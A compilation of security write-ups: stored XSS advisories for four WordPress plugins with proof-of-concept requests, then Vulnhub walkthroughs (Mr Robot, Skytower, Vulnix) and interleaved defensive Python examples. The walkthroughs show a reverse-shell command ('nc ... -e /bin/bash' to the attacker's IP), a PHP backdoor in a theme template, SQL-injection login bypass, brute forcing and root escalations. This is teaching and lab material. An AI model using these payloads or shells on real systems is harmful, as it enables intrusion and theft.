Stored XSS Vulnerability in WordPress Responsive Lightbox2 Plugin

WordPress Responsive Lightbox2 Plugin version 1.0.2 and below was found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

The WordPress Responsive Lightbox2 plugin is used to add lightbox functionality to your WordPress site. It was found to be vulnerable to stored Cross-Site Scripting (XSS). XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The ‘hyperlink’ field used while linking an image from a URL was found to be vulnerable to stored XSS, as the plugin did not sanitize user-supplied input properly before publishing the post. It is triggered when a user loads a page where the plugin shortcode is used. All WordPress websites using Responsive Lightbox2 version 1.0.2 and below are affected.

The image below shows our JavaScript being executed when the following string is inserted into the post.

[lightbox2 url="http://example.com/wp-content/uploads/images/lightbox.jpg" hyperlink="<script>alert(0)</script>"]

This vulnerability can be exploited by attackers to steal the session cookies of any user, including the website’s administrators. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.

Proof of Concept

POST /w/wp-json/wp/v2/posts/208?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 140
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=208&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

{"id":208,"content":"[lightbox2 url=\"http://example.com/wp-content/uploads/images/lightbox.jpg\" hyperlink=\"<script>alert(0)</script>\"]"}

Recommendation

All user input should be sanitized before the post is published.

Stored XSS Vulnerability in WordPress NextGen Gallery Sell Photo Plugin

WordPress NextGen Gallery Sell Photo Plugin version 1.0.4 and below was found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

The WordPress NextGen Gallery Sell Photo plugin is used to sell photos directly from NextGen Gallery in a WordPress blog, with payment through PayPal. It was found to be vulnerable to stored Cross-Site Scripting (XSS). XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The Button Text/Image field on the Settings page of the Sell Photos plugin was found to be vulnerable to stored XSS, as the plugin did not sanitize user-supplied input properly. It is triggered when a user loads a page where the plugin is used, and when an admin opens the settings page of the plugin.

The image below shows our JavaScript being executed when the following string is given in the Button Text/Image field.

Buy Now "><script>alert(0)</script>

This vulnerability can be exploited by attackers to steal the session cookies of any user, including the website’s administrators.

Proof of Concept

POST /w/wp-admin/options-general.php?page=nextgen-sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 336
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=nextgen-sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

_wpnonce=a48671c8bf&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dnextgen-sell-photo-settings&paypal_email=john%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&return_url=http%3A%2F%2F127.0.0.1%2Fw&ngsp_update_settings=Save+Changes

Recommendation

All user input should be sanitized before it is used.

Stored XSS Vulnerability in WordPress Easy Media Download Plugin

WordPress Easy Media Download Plugin version 1.1.4 and below was found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

The WordPress Easy Media Download plugin is used to insert a download link directly from the WordPress post editor without writing HTML. It was found to be vulnerable to stored Cross-Site Scripting (XSS). XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The ‘Button Text’ field used while posting a file download was found to be vulnerable to stored XSS, as the plugin did not sanitize user-supplied input properly before publishing the post. It is triggered when a user loads a page where the plugin shortcode is used. All WordPress websites using Easy Media Download by naa986 version 1.1.4 and below are affected.

The image below shows our JavaScript being executed when the following string is inserted into the post.

[easy_media_download url="http://example.com/wp-content/uploads/file.zip" text="Free Download <script>alert(document.cookie)</script>"]

This vulnerability can be exploited by attackers to steal the session cookies of any user, including the website’s administrators. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.

Proof of Concept

POST /w/wp-json/wp/v2/posts/186?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 162
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=186&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close

{"id":186,"content":"[easy_media_download url=\"http://example.com/wp-content/uploads/file.zip\" text=\"Free Download <script>alert(document.cookie)</script>\"]"}

Recommendation

All user input should be sanitized before the post is published.

Stored XSS Vulnerability in WordPress Sell Photo Plugin

WordPress Sell Photo Plugin version 1.0.5 and below was found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

The WordPress Sell Photo plugin is used to sell photos directly from a WordPress blog, with payment through PayPal. It was found to be vulnerable to stored Cross-Site Scripting (XSS). XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The Button Text/Image field on the Settings page of the Sell Photos plugin was found to be vulnerable to stored XSS, as the plugin did not sanitize user-supplied input properly. It is triggered when a user loads a page where the plugin is used, and when an admin opens the settings page of the plugin.

The image below shows our JavaScript being executed when the following string is given in the Button Text/Image field.

Buy Now "><script>alert(0)</script>

This vulnerability can be exploited by attackers to steal the session cookies of any user, including the website’s administrators.

Proof of Concept

POST /w/wp-admin/options-general.php?page=sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 339
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close

_wpnonce=14d5bbccf9&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dsell-photo-settings&enable_testmode=1&paypal_email=jajaja%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&return_url=http%3A%2F%2F95.217.19.38%2Fw&sell_photo_update_settings=Save+Changes

Recommendation

All user input should be sanitized before it is used.

References

  1. https://packetstormsecurity.com/files/158872/WordPress-Sell-Photo-1.0.5-Cross-Site-Scripting.html

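All four advisories above share one root cause: a value that a user typed (a shortcode attribute or a settings field) is written into an HTML attribute without being escaped for that context, so a quote or a <script> tag in the value becomes live markup. The following Python illustration is an added example, not the plugins' PHP: it renders the two payload shapes from the advisories through an unescaped path and an escaped path, so the difference the recommendations ask for is visible. The renderers, the IMAGE_URL and the payload strings are assumed test values; in WordPress the equivalent calls are esc_attr() for attribute values, esc_url() for URLs, and sanitize_text_field() when a settings value is saved.

```python
import html
from urllib.parse import urlsplit

# Constructed sample values shaped like the payloads in the advisories above;
# they are inputs for this illustration, not plugin code.
IMAGE_URL = "http://example.com/wp-content/uploads/images/lightbox.jpg"
HYPERLINK_PAYLOAD = "<script>alert(0)</script>"
BUTTON_PAYLOAD = 'Buy Now "><script>alert(0)</script>'


def attr_unsafe(value):
    """What the vulnerable versions effectively did: emit the value verbatim."""
    return str(value)


def attr_safe(value):
    """Escape for the HTML attribute context: < > & " and ' become entities,
    so the value can neither close the attribute nor open a tag.
    WordPress's esc_attr() does the same job in PHP."""
    return html.escape(str(value), quote=True)


def url_safe(url):
    """Accept only absolute http(s) URLs, then attribute-escape the result.
    WordPress's esc_url() performs a comparable scheme check."""
    parts = urlsplit(str(url).strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return ""
    return attr_safe(url)


def render_lightbox(url, hyperlink, escape=attr_safe, url_escape=url_safe):
    """Hypothetical renderer for a [lightbox2 url=... hyperlink=...] shortcode
    (an assumed shape, not the plugin's own template)."""
    return '<a href="{0}" title="{1}"><img src="{0}"></a>'.format(
        url_escape(url), escape(hyperlink))


def render_button(text, escape=attr_safe):
    """Hypothetical renderer for the Buy Now button text, which is also what
    the settings page echoes back into its own <input value="..."> field."""
    return '<input type="submit" value="{0}">'.format(escape(text))


def has_live_script(markup):
    """True when a real <script> tag survived into the markup."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    cases = (
        ("unsafe lightbox", render_lightbox(IMAGE_URL, HYPERLINK_PAYLOAD,
                                            escape=attr_unsafe, url_escape=attr_unsafe)),
        ("safe lightbox", render_lightbox(IMAGE_URL, HYPERLINK_PAYLOAD)),
        ("unsafe button", render_button(BUTTON_PAYLOAD, escape=attr_unsafe)),
        ("safe button", render_button(BUTTON_PAYLOAD)),
    )
    for label, markup in cases:
        print("%-15s live script: %-5s %s" % (label, has_live_script(markup), markup))
```

The escaped button text comes out as `Buy Now &quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;`, which the browser displays as the literal characters instead of closing the value attribute. Escaping at output time is the part that stops the XSS; validating on save (rejecting a non-http URL, stripping tags from a button label) is defence in depth on top of it, not a replacement.
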
Mr Robot 1 Vulnhub Machine Walkthrough

Today we will root the Mr Robot 1 machine from Vulnhub.

As usual, first find the IP of the machine.

nmap -sn 192.168.18.0/24

Now let's do a scan of the machine.

nmap -sV -O -A -T5 192.168.18.96

There is a web server running on port 80. Let's have a look.

Cool, let's do a directory scan with Gobuster.

root@kali:~# gobuster dir -u 192.168.18.96 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

We have wp-content, wp-admin and wp-login on the server, so we can guess that a WordPress installation is there.

Before that, let's have a look at robots.txt.

This robots file disallows fsocity.dic and key-1-of-3.txt.

fsocity.dic is a wordlist. Let's save it so that we can use it for fuzzing later.

This is key-1-of-3. That means we need to find 2 more keys.

Now we need to find the username and password. Go to the login page and try the usual combinations.

Now let's try to find usernames from our .dic file using Burp Suite.

Capture the request and send it to Intruder.

Click Clear and select the username field as the position to insert the payload.

Now run this command to remove the repeated lines in fsocity.dic:

sort fsocity.dic | uniq > test.txt

The original file is 6 MB and our new file is just 94 KB. Use this file as the payload list in Burp.

Now load the file and start the attack. The attack will be faster in the paid version of Burp Suite.

The usual response length is 4145 when the username is wrong, but when the username is elliot the response length is 4196. Let's try that in the browser.

The username elliot is right. Now we need to find the password using the same method.

Get the login request, send it to Intruder, and use the same file for fuzzing.

We got the password too: ER28-0652.

And we're logged in.

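The enumeration above works because wp-login.php answers a wrong username and a wrong password with pages of different sizes, and the brute force works because nothing limits the number of attempts. From the defender's side the same activity is easy to spot in the web server's access log: a burst of POSTs to wp-login.php from one client, with more than one response size for the same form. The following is an added example (not part of the walkthrough) that parses constructed Apache combined-format lines and flags such bursts; the log lines, the threshold and the window size are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache-style access log lines (not from the walkthrough): one
# client hammers wp-login.php and gets a different response size for exactly one
# submitted username, while a second client logs in once normally.
SAMPLE_LOG = """\
192.168.18.10 - - [12/Aug/2020:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4145 "-" "Mozilla/5.0"
192.168.18.10 - - [12/Aug/2020:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4145 "-" "Mozilla/5.0"
192.168.18.10 - - [12/Aug/2020:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4145 "-" "Mozilla/5.0"
192.168.18.10 - - [12/Aug/2020:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4196 "-" "Mozilla/5.0"
192.168.18.10 - - [12/Aug/2020:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4145 "-" "Mozilla/5.0"
192.168.18.10 - - [12/Aug/2020:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4145 "-" "Mozilla/5.0"
192.168.18.20 - - [12/Aug/2020:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 10234 "-" "Mozilla/5.0"
192.168.18.20 - - [12/Aug/2020:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def detect_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"attempts": n, "sizes": [...]}} for every client that POSTed
    to wp-login.php at least `threshold` times within any `window`-long span."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            per_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):            # sliding window over sorted timestamps
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "attempts": len(recs),
                    # more than one size for the same form is the oracle used above
                    "sizes": sorted({r["size"] for r in recs}),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_login_bursts(SAMPLE_LOG).items():
        print("%s: %d login POSTs, response sizes %s" % (ip, info["attempts"], info["sizes"]))
```

On the sample data only 192.168.18.10 is reported, with six attempts and the two sizes 4145 and 4196. Rate-limiting wp-login.php (or a login-lockout plugin) removes the brute force; making the error page identical for an unknown user and a wrong password removes the size oracle.
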
Now we need a reverse shell. Let's do that by editing a page template.

Visit the following page and select the 404 Template.

http://192.168.18.96/wp-admin/theme-editor.php

This page is shown in case of a 404 error in this WordPress installation. If we add our backdoor script to this template and then load a non-existent page, we get a reverse shell. Paste the contents of the following file there:

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

and update the IP and port with your attacker IP and listening port number.

Let's get a shell from this page. First listen on Kali with nc, then connect from the server.

nc -nlvp 4444

Visit any non-existent page on the site:

http://192.168.18.96/melbin.in

We got a shell.

When we look at the home folder of user robot, we can find a file named password.raw-md5.

We also have key 2 of 3, but we don't have read permission on it.

Let's open the password.raw-md5 file.

Let's copy the MD5 hash and search online.

https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b

We have the password of robot. Let's change user to robot now. But we need to run that from a TTY shell. Use this command:

python -c 'import pty; pty.spawn("/bin/sh")'

We have nmap on the machine; we can verify that with

which nmap

Now have a look at https://gtfobins.github.io/gtfobins/nmap/#sudo to learn how to do privilege escalation with nmap.

Let's try this.

We got root access now. Let's read the second flag.

What about the third flag?

It is here.

Let's read that too.

So, we have completed Mr. Robot 1.

Cheers!

Skytower 1 Vulnhub Machine Walkthrough

Today, let's work on the Skytower 1 Vulnhub machine.

Let's find the IP first.

root@kali:~# nmap -sn 192.168.18.0/24
Nmap scan report for 192.168.18.94
Host is up (0.0086s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

So, our IP is 192.168.18.94. Let's do a simple port scan.

root@kali:~# nmap -O -sV 192.168.18.94

There is a web server running on port 80. Let's have a look.

A login page. Let's try SQL injection.

We can use Burp Suite for this. Download a list of payloads to be checked from here:

https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list

Now let's capture the request in Burp.

Then right-click and send it to Intruder.

Set the attack type to ‘pitchfork’ and make sure that the email and password fields are selected.

Now go to Payloads and load the payload list we downloaded for the first and second payload sets.

and click Start Attack.

While the attack runs, we can notice that the response length of some requests is 231 and of some is 1838. The ones with 1838 are the ones we want: they are successful logins.

Here let's try '-' as email and password.

And we're in!

We have the SSH login credentials now. Let's try logging in.

It's not connecting. But remember, we have a Squid proxy open on port 3128.

Let's try connecting through it.

Add the following line to /etc/proxychains.conf:

http 192.168.18.94 3128

Now, let's try connecting to the machine.

We logged in to the server and were logged out automatically. Let's try running a command upon login.

root@kali:~# proxychains ssh -t [email protected] ls -la

OK, so our command is working, but we still get logged out. Let's try to get a reverse shell through this.

First check if netcat is present there.

Yes. Now let's spawn a reverse shell.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

We executed the command and got a reverse shell on our Kali machine.

We are in. Now let's have a look at /etc/passwd.

There are two more users, sara and william.

Let's try to find out the passwords of sara and william too and log in.

username: [email protected]
password: '-'

username: [email protected]
password: '-'

We got the password of sara. Let's try logging in.

root@kali:~# proxychains ssh -t [email protected] nc 192.168.18.92 4444 -e /bin/bash

We got access to sara’s account.

Run sudo -l to view sara’s sudo permissions.

So, sara can use cat and ls in the /accounts/ directory with root permissions.

According to this page, https://superuser.com/questions/355029/how-to-automatically-run-commands-on-ssh-login, we can execute a script upon SSH login if we place it in the .bashrc file.

Let's have a look.

cat .bashrc

Let's try removing this and logging in again.

rm .bashrc

Logged in.

Now we can use sudo ls /accounts/ on the machine with root permissions.

What about sudo ls /accounts/../ ? Let's try.

Using this method, we can go back to the /root directory and find a flag.txt file there.

Now use cat to read the file.

sudo cat /accounts/../root/flag.txt

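The sudo rule above fails because a wildcard such as /accounts/* is matched as a glob against the raw argument string, and in sudoers the asterisk also matches slashes, so /accounts/../root/flag.txt satisfies it while resolving to a file outside /accounts. The following is an added example, not anything from the walkthrough or the machine, that contrasts that glob match with a containment check that normalises the path first, and that scans sudoers-style lines for argument wildcards; the SAMPLE_SUDOERS text is a constructed guess at the rule's shape.

```python
import fnmatch
import os
import re

ALLOWED_ROOT = "/accounts"

# Constructed sudoers lines: an assumed shape of the rule seen above, not the
# machine's actual file.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
sara    ALL=(ALL) NOPASSWD: /bin/cat /accounts/*, /bin/ls /accounts/*
william ALL=(ALL) NOPASSWD: /bin/ls /accounts/william/
"""


def glob_allows(path, pattern="/accounts/*"):
    """How a wildcard command spec is matched: a plain glob on the raw string.
    '*' also matches '/', so a '..' component slips through untouched."""
    return fnmatch.fnmatchcase(path, pattern)


def contained_allows(path, root=ALLOWED_ROOT):
    """Normalise the path first, then require the result to stay under root.
    normpath collapses '.' and '..' lexically; for a live filesystem use
    os.path.realpath so symlinks are followed before the check."""
    if not os.path.isabs(path):
        return False
    resolved = os.path.normpath(path)
    return os.path.commonpath([root, resolved]) == root


RULE_RE = re.compile(r'^(?P<user>\S+)\s+\S+=\S*\s*(?:NOPASSWD:\s*)?(?P<cmds>.+)$')


def wildcard_rules(sudoers_text):
    """Return (user, command) pairs whose argument part contains a glob character."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line else None
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            args = cmd.split(None, 1)[1] if " " in cmd else ""
            if any(ch in args for ch in "*?["):
                hits.append((m.group("user"), cmd))
    return hits


if __name__ == "__main__":
    probe = "/accounts/../root/flag.txt"
    print("glob match:       ", glob_allows(probe))
    print("containment check:", contained_allows(probe))
    for user, cmd in wildcard_rules(SAMPLE_SUDOERS):
        print("wildcard argument in rule for %s: %s" % (user, cmd))
```

The glob accepts the traversal path and the containment check rejects it, and the scan reports both of sara's commands. The practical fix on the sudoers side is to list the exact files sara may read, or to wrap the read in a script that applies the containment check itself before calling cat.
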
We got the root password now. Let's try to become root using the su command.

We are root!

Hacklab Vulnix, Vulnhub Machine Walkthrough

Today we are working on the Vulnix machine from Vulnhub.

Let's find the IP first.

nmap -sN 192.168.18.92/24

We got the IP: 192.168.18.93.

Let's do a detailed scan now.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 04:47 EDT

Nmap scan report for 192.168.18.93
Host is up (0.0050s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 
25/tcp    open  smtp       Postfix smtpd
 
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| 
|_sslv2-drown: 
79/tcp    open  finger     Linux fingerd
|
110/tcp   open  pop3       Dovecot pop3d
|_
|  
|_sslv2-drown: 
111/tcp   open  rpcbind    2-4 (RPC #100000)
|
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      33365/udp6  mountd
|   100005  1,2,3      47947/tcp6  mountd
|   100005  1,2,3      56458/udp   mountd
|   100005  1,2,3      57756/tcp   mountd
|   100021  1,3,4      39547/udp   nlockmgr
|   100021  1,3,4      47952/tcp6  nlockmgr
|   100021  1,3,4      53508/udp6  nlockmgr
|   100021  1,3,4      53795/tcp   nlockmgr
|   100024  1          38357/udp   status
|   100024  1          39369/tcp   status
|   100024  1          48082/udp6  status
|   100024  1          57952/tcp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_
512/tcp   open  exec       netkit-rsh rexecd

513/tcp   open  login?

514/tcp   open  tcpwrapped
|
993/tcp   open  ssl/imaps?
|_

995/tcp   open  ssl/pop3s?

2049/tcp  open  nfs_acl    2-3 (RPC #100227)

39369/tcp open  status     1 (RPC #100024)
 
42985/tcp open  mountd     1-3 (RPC #100005)
 
48267/tcp open  mountd     1-3 (RPC #100005)
 
53795/tcp open  nlockmgr   1-4 (RPC #100021)
 
57756/tcp open  mountd     1-3 (RPC #100005)
 
MAC Address: 08:00:27:67:74:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.97 ms 192.168.18.93

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.55 seconds

finger is running on port 79. Let's do some user enumeration first.

We got a few users.

Let's try brute-forcing the logins.

Make a text file with the usernames.

Let's run medusa with rockyou.txt:

medusa -h 192.168.18.93 -U vulnix_users.txt -P rockyou.txt -e ns -f -M ssh > medusa.txt

Let's try to enumerate further while the brute forcing is going on in the background.

From the detailed scan above, we can see that NFS is running on port 2049. Let's go deeper.

nmap -sV --script=nfs-* 192.168.18.93

We have an NFS share at /home/vulnix. Let's try to mount it on our machine.

But we don't have permission to open it.

Let's go back to our medusa and check the results.

So, the password for the account user is letmein.

Let's try to log in to the machine.

Let's now check the /etc/passwd file and get the details of the vulnix user.

If we add this user to our system with the same uid, 2008, we can read the mounted directory. Right? Let's try.

useradd -u 2008 vulnix
su vulnix
cd /tmp/vulnix
ls -la

We got access to vulnix’s home folder.

If we place our id_rsa.pub key in /mnt/vulnix/.ssh/authorized_keys we can log in without a password.

Create a key, if you have not created one yet:

ssh-keygen -t rsa

Now copy the public key to /tmp and change its owner to vulnix.

Add the file to /mnt/vulnix/.ssh/authorized_keys.

Now we can log in as vulnix on the target machine without a password.

Let's see what we can do with this user.

sudo -l

We can edit the /etc/exports file as root without a password.

According to this article, https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/, the *(rw,root_squash) option is used to prevent file access as root. Since we have edit access to this file, we can change that.

Made the change and saved.

We need to restart NFS to bring our change into effect; since we don't have root access, let's restart the machine.

Now remount the share and copy our /bin/bash to the mounted directory.

root@kali:/mnt/vulnix# cp /bin/bash .

The file is present in the home folder of vulnix, owned by root. Let's try to run that.

./bash
whoami
root

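Two separate NFS weaknesses carried this box: root_squash only remaps uid 0, so creating a local user with the matching uid 2008 was enough to read the share, and once the export was changed to no_root_squash a root-owned binary copied onto it ran as root on the server. The following is an added example, not the machine's configuration or the walkthrough's code, that parses exports(5) syntax and flags the three patterns involved: no_root_squash, exports open to every client, and writable exports without all_squash. SAMPLE_EXPORTS is constructed; only its first line mirrors the shape described above.

```python
import re

# Constructed /etc/exports content (assumed, not the machine's file). The first
# line is the shape the walkthrough describes; the others are added for contrast.
SAMPLE_EXPORTS = """\
# /etc/exports
/home/vulnix  *(rw,root_squash)
/srv/public   192.168.18.0/24(ro,sync)
/srv/build    *(rw,no_root_squash,sync)
/srv/data     10.0.0.5(rw)  *(ro)
"""

# host(opt,opt) or a bare host with default options
CLIENT_RE = re.compile(r'(?P<host>[^\s(]+)\((?P<opts>[^)]*)\)|(?P<bare>\S+)')


def parse_exports(text):
    """Return one {"path", "host", "opts"} dict per client spec in exports(5) syntax."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1] if len(parts) > 1 else ""
        for m in CLIENT_RE.finditer(clients):
            if m.group("bare"):
                host, opts = m.group("bare"), []
            else:
                host = m.group("host")
                opts = [o.strip() for o in m.group("opts").split(",") if o.strip()]
            entries.append({"path": path, "host": host, "opts": opts})
    return entries


def audit_exports(text):
    """Return (path, host, reason) findings for the risky patterns discussed above."""
    findings = []
    for e in parse_exports(text):
        opts = set(e["opts"])
        path, host = e["path"], e["host"]
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash: a client's root keeps uid 0 on the share"))
        if host == "*":
            findings.append((path, host, "exported to every client"))
        if "rw" in opts and "all_squash" not in opts:
            # root_squash alone does not stop a client that simply uses the same uid
            findings.append((path, host, "rw without all_squash: any client-side uid maps straight onto share files"))
    return findings


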